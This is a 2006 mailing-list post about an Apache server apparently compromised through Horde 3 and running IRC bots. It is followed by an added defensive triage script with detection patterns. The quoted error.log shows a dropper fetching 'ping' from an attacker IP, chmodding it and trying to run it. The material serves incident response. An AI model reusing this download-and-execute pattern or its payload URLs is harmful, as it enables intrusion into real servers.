[H-GEN] apache2 compromised or just attempts?
Troy Piggins
troy at piggo.com
Sun May 28 20:21:47 EDT 2006
* Troy Piggins <troy at piggo.com> :
>
[snip]
> Yesterday the web server stopped working. It is not showing up in 'pstree'.
> Looking at netstat, this is the (worrying) output:
>
> -----8<-----
> Active Internet connections (w/o servers)
> Proto Recv-Q Send-Q Local Address Foreign Address State
> tcp 0 0 armadillo.p:netbios-ssn linus.piggo.local:rootd ESTABLISHED
> tcp 0 0 localhost.localdo:51625 localhost.localdo:32769 ESTABLISHED
> tcp 0 0 10.1.1.11:43404 zagreb.hr.eu.under:ircd ESTABLISHED
> tcp 0 0 10.1.1.11:43411 zagreb.hr.eu.under:ircd ESTABLISHED
> tcp 0 0 10.1.1.11:55893 lemming.euronet.nl:ircd ESTABLISHED
> tcp 0 0 10.1.1.11:47631 checkip.chi.dyndns.:www CLOSE_WAIT
> tcp 0 0 localhost.localdo:32769 localhost.localdo:51625 ESTABLISHED
> tcp 0 0 10.1.1.11:33570 oslo2.no.eu.undern:6669 ESTABLISHED
> tcp 1 0 armadillo.piggo.d:49430 armadillo.piggo.dy:nntp CLOSE_WAIT
> [snip]
> -----8<-----
>
> 10.1.1.11 is my Ubuntu machine's IP address of its wireless card connection
> to my wireless modem/router.
>
> What the hell are those ircd entries? Am I compromised? What is my next
> step?
I've since found out that it's a Horde 3 vulnerability - well, that's the likely
candidate at the moment.
I've uninstalled it, but how do I stop those IRC servers?
> [1] extract of /var/log/apache1/error.log.4.gz
>
> -----8<-----
> [Mon May 01 15:38:10 2006] [error] [client 216.65.11.137] script '/var/www/thisdoesnotexistahaha.php' not found or unable to stat
> [Mon May 01 15:38:12 2006] [error] [client 216.65.11.137] File does not exist: /var/www/horde-cvs
> [Mon May 01 15:38:12 2006] [error] [client 216.65.11.137] File does not exist: /var/www/pub/horde-cvs
> --20:41:57-- http://81.58.26.26/libsh/ping.txt
> => `ping.txt'
> Connecting to 81.58.26.26:80... connected.
> HTTP request sent, awaiting response... 200 OK
> Length: 358 [text/plain]
> ping.txt: Permission denied
>
> Cannot write to `ping.txt' (Permission denied).
> mv: cannot stat `ping.txt': No such file or directory
> perl: warning: Setting locale failed.
> perl: warning: Please check that your locale settings:
> LANGUAGE = "en_US",
> LC_ALL = (unset),
> LANG = "en_US"
> are supported and installed on your system.
> perl: warning: Falling back to the standard locale ("C").
> Can't open perl script "temp2006": No such file or directory
> --20:41:57-- http://81.58.26.26/libsh/ping
> => `ping'
> Connecting to 81.58.26.26:80... connected.
> HTTP request sent, awaiting response... 200 OK
> Length: 15,808 (15K) [text/plain]
> ping: Permission denied
>
> Cannot write to `ping' (Permission denied).
> chmod: invalid mode string: `x'
> sh: ./ping: No such file or directory
> sh: curl: command not found
> -----8<-----
--
Troy Piggins
,-o Ubuntu v5.10 (Breezy Badger): kernel 2.6.12-10-k7,
o ) postfix 2.2.4, procmail 3.22, mutt 1.5.11i,
`-o slrn 0.9.8.1/rt (score_color patch), vim 7.0
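The question at the end of the message ("how do I stop those IRC servers?") is really "which process owns those connections, and what else did the web-server user run?". The wget, mv, chmod, perl and sh output sitting in Apache's error.log is the stderr of commands executed by the httpd child, which is the sign that the Horde probe succeeded in running commands as the web-server user. The script below is an added example, not code from the original post or from any of the software mentioned: it flags IRC connections in netstat output, pulls the tell-tale lines and download URLs out of an error.log, and (on the live host, as root) maps the connections to PIDs via /proc. The function names, the 6660-6669 port heuristic and the pattern list are my own assumptions; the sample data is transcribed from the post (netstat truncates hostnames itself; the error.log lines are rejoined where the mail wrapped them).

```shell
#!/bin/sh
# Added triage helpers for a web server with unexplained outbound IRC
# connections after a Horde probe. They read netstat(8) "w/o servers"
# output and an Apache error.log on stdin, so they accept a saved copy
# (the samples below) or live data. Names and the port range are my own
# choices, not anything from the original post.

# Flag connections whose foreign endpoint is an IRC service: the service
# name "ircd" (6667 in /etc/services) or a numeric port in 6660-6669.
# Only the foreign-address column ($5) is inspected and the whole line is
# printed, so "netstat -t" output with or without -n/-p works the same.
irc_connections() {
    awk '$1 == "tcp" || $1 == "tcp6" {
        n = split($5, f, ":"); port = f[n]
        if (port == "ircd" || (port ~ /^[0-9]+$/ && port+0 >= 6660 && port+0 <= 6669))
            print
    }'
}

# Flag error.log lines that betray commands run by the web-server user:
# wget banners and write failures, shell/coreutils errors that carry no
# Apache timestamp prefix, and 404s for Horde paths (the preceding probe).
dropper_indicators() {
    grep -E \
        -e '^--[0-9]{2}:[0-9]{2}:[0-9]{2}-- +https?://' \
        -e 'Cannot write to' \
        -e '^(sh|chmod|mv|perl): ' \
        -e 'File does not exist: .*/horde'
}

# List the URLs the dropper tried to fetch, for retrieval and analysis
# from a machine you do not care about.
dropper_urls() {
    grep -E '^--[0-9]{2}:[0-9]{2}:[0-9]{2}-- +https?://' |
        grep -oE 'https?://[^ ]+' | sort -u
}

# On the live host, as root (netstat -p only fills the PID column for
# root): show the IRC connections, then each owning process's binary,
# working directory and command line before you kill it. Linux-only
# because of /proc; not executed here.
live_triage() {
    conns=$(netstat -tnp 2>/dev/null | irc_connections)
    printf '%s\n' "$conns"
    printf '%s\n' "$conns" | awk '{ print $NF }' | cut -d/ -f1 |
        grep -E '^[0-9]+$' | sort -u | while read -r pid; do
            echo "== PID $pid"
            ls -l "/proc/$pid/exe" "/proc/$pid/cwd" 2>/dev/null
            tr '\0' ' ' < "/proc/$pid/cmdline"; echo
        done
}

# Samples transcribed from the post (netstat truncates hostnames itself;
# error.log lines rejoined where the mail wrapped them).
NETSTAT_SAMPLE='tcp 0 0 armadillo.p:netbios-ssn linus.piggo.local:rootd ESTABLISHED
tcp 0 0 10.1.1.11:43404 zagreb.hr.eu.under:ircd ESTABLISHED
tcp 0 0 10.1.1.11:43411 zagreb.hr.eu.under:ircd ESTABLISHED
tcp 0 0 10.1.1.11:55893 lemming.euronet.nl:ircd ESTABLISHED
tcp 0 0 10.1.1.11:47631 checkip.chi.dyndns.:www CLOSE_WAIT
tcp 0 0 10.1.1.11:33570 oslo2.no.eu.undern:6669 ESTABLISHED
tcp 1 0 armadillo.piggo.d:49430 armadillo.piggo.dy:nntp CLOSE_WAIT'

ERRLOG_SAMPLE=$(cat <<'EOF'
[Mon May 01 15:38:10 2006] [error] [client 216.65.11.137] script '/var/www/thisdoesnotexistahaha.php' not found or unable to stat
[Mon May 01 15:38:12 2006] [error] [client 216.65.11.137] File does not exist: /var/www/horde-cvs
[Mon May 01 15:38:12 2006] [error] [client 216.65.11.137] File does not exist: /var/www/pub/horde-cvs
--20:41:57--  http://81.58.26.26/libsh/ping.txt
           => `ping.txt'
Connecting to 81.58.26.26:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 358 [text/plain]
ping.txt: Permission denied
Cannot write to `ping.txt' (Permission denied).
mv: cannot stat `ping.txt': No such file or directory
Can't open perl script "temp2006": No such file or directory
--20:41:57--  http://81.58.26.26/libsh/ping
           => `ping'
Connecting to 81.58.26.26:80... connected.
Cannot write to `ping' (Permission denied).
chmod: invalid mode string: `x'
sh: ./ping: No such file or directory
sh: curl: command not found
EOF
)

# Run against the saved samples: 4 IRC connections, 10 indicator lines,
# 2 dropper URLs.
printf '%s\n' "$NETSTAT_SAMPLE" | irc_connections
printf '%s\n' "$ERRLOG_SAMPLE" | dropper_indicators
printf '%s\n' "$ERRLOG_SAMPLE" | dropper_urls
```

Two things a practitioner would note here. The "Permission denied" lines show that wget could not write into the directory the command ran from, yet the established IRC sessions (and the checkip.dyndns.org connection, which bots use to learn their public address) show that a payload did run, so look for it in world-writable locations such as /tmp, /var/tmp and /dev/shm, and in the web-server user's crontab. And killing the bot process is not the end of it: once an attacker has executed arbitrary commands as the web-server user, the honest remedy is to take the host offline, preserve the logs, and rebuild it with a patched Horde (or none), rather than trust a cleaned-up copy.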